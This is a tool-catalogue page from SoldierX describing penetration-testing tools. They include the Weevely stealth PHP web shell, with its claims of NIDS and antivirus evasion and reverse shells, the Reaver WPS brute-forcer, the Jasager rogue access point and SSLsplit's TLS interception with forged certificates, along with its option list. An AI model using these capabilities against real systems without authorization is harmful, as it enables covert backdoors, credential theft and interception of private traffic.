SOLDIERX.COM Nobody Can Stop Information Insemination

DOMinator is a Firefox based software for analysis and identification of DOM Based Cross Site Scripting issues (DomXss). It is the first runtime tool which can help security testers to identify DomXss.

Dominator is available in two different editions: Free and Professional. Free is open to the community, Pro has additional features like better support, intuitive GUI, more extensive rulebase and knowledge base.

OpenPuff is a professional steganography tool: •HW seeded random number generator (CSPRNG)
•Deniable steganography
•Carrier chains (up to 256Mb of hidden data)
•Carrier bits selection level
•Modern multi-cryptography (16 algorithms)
•Multi-layered data obfuscation (3 passwords)
•X-squared steganalysis resistance

Unique layers of security and obfuscation: •256bit+256bit symmetric-key cryptography with KDF4 password extension
•256bit symmetric-key data scrambling (CSPRNG-based shuffling)
•Data whitening (CSPRNG-based noise mixing)
•Adaptive non-linear carrier bit encoding

Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

Official website:
http://epinna.github.com/Weevely/

Getting started with a quick Tutorial:
https://github.com/epinna/Weevely/wiki/Tutorial

Or show list of available Modules and backdoor Generators:
https://github.com/epinna/Weevely/wiki/Modules-list
https://github.com/epinna/Weevely/wiki/Generators-list

Main features:
* More than 30 modules to automate administration and post exploitation tasks:
o Execute commands and browse remote filesystem, even with PHP security restriction
o Audit common server misconfigurations
o Run SQL console pivoting on target machine
o Proxy your HTTP traffic through target
o Mount target filesystem to local mount point
o File transfer from and to target
o Spawn reverse and direct TCP shells
o Bruteforce SQL accounts through target system users
o Run port scans from target machine
o And so on..

* Backdoor communications are hidden in HTTP Cookies
* Communications are obfuscated to bypass NIDS signature detection
* Backdoor polymorphic PHP code is obfuscated to avoid HIDS AV detection

Weevely author keep Dissecting, a security related blog:
http://disse.cting.org/

The BackTrack Linux 5r2-PenTesting Edition lab is an all-in-one penetration testing lab environment that includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing. It includes:

- A master (base) host utilizing BackTrack Linux 5r2
- A DMZ network with two hosts (targets)
- An “internal” network with one host (target)
- A pre-configured firewall

PhantomJS is a headless WebKit with JavaScript API. It has fast and native support for various web standards: DOM handling, CSS selector, JSON, Canvas, and SVG. It works like a web proxy that allows you to view and edit DOM, CSS, JSON and other code.

Store passwords in encrypted files with an easy to use command line interface, and utilities to use the passwords in code. In its simplest form, the keys are generated per environment with OS access controls while the password files are stored in SCM

Jasager is an implementation of Karma designed to run on OpenWrt on the Fon. It will probably run on most APs with Atheros wifi cards but it was designed with the Fon in mind as it is a nice small AP which gives it a lot of scope for use in penetration tests and other related fun.

A quick highlight of features:
•Web interface showing currently connected clients with their MAC address, IP address (if assigned) and the SSID they associated with
•The web interface allows control of all Karma features and can either run fully featured through AJAX enabled browsers or just as well through lynx
•Auto-run scripts on both association and IP assignment
•Full logging for later review
•Pluggable module system for easy extensibility
•Basic command line interface so you don't have to remember the different iwpriv commands

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla!

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit removes HPKP response headers in order to prevent public key pinning.

Usage
% sslsplit -h
Usage: sslsplit [options...] [proxyspecs...]
-c pemfile use CA cert (and key) from pemfile to sign forged certs
-k pemfile use CA key (and cert) from pemfile to sign forged certs
-C pemfile use CA chain from pemfile (intermediate and root CA certs)
-K pemfile use key from pemfile for leaf certs (default: generate)
-t certdir use cert+chain+key PEM files from certdir to target all sites
matching the common names (non-matching: generate if CA)
-O deny all OCSP requests on all proxyspecs
-P passthrough SSL connections if they cannot be split because of
client cert auth or no matching cert and no CA (default: drop)
-g pemfile use DH group params from pemfile (default: keyfiles or auto)